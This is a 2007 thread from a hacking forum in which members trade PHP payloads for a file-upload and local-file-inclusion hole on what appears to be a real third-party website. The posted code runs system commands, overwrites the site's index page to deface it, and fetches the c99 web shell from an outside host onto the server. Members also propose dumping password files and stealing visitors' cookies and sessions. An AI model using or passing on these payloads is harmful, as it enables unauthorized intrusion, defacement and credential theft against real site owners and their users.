Donate to us via Paypal!
You cannot teach a man anything; you can only help him find it within himself. - Galileo
Friday, October 30, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 122
Guests Online: 116
Members Online: 6

Registered Members: 129511
Newest Member: katty111
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

LFI JPEG PHP code


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 09-09-07 20:04
Ok I found the site that lets users upload JPEG pics and it is vulnerable to LFI. I put a small php script in the pic
Code
<? ob_clean(); system("dir"); die; ?>


and it gave me the directory of the site. I echoed a message
Code
<? ob_clean(); system("echo Hello"); die; ?>


and it worked. I was wondering can a script be used to overwrite the index someway. I tried
Code
<? ob_clean(); system("echo La Verdad Estaba Aqui> index.php"); die; ?>


but I got an error about some T_string or something.


Author

RE: LFI JPEG PHP code


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 09-09-07 20:22
try to open the index file for writing, for example

Code
<?php $file=fopen("index.php", "w"); fwrite($file,"hacked!"); ?>




that's how I'd try it.


Author

RE: LFI JPEG PHP code


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-09-07 04:07
Are there any tuts on LFI with upload scripts? Am I right in thinking that most upload scripts just take $_FILES and moves it from the tmp to another location, so at no point is it executed when its uploaded. I suppose though if it's uploaded on the victim server, if anyone views that image you can log their ip/cookie/session etc?
Author

RE: LFI JPEG PHP code


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-09-07 04:12
I found out wat 2 do
Code
<? fwrite(fopen("./c99.php", "w"), file_get_contents("http://www.place.com/c99.txt")); ?>




it uploads a shell


Author

RE: LFI JPEG PHP code


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-09-07 04:14
Nice, you could have also like printed out password files etc. I guess

At what stage is that code executed though? When its first uploaded or when its viewed on the site?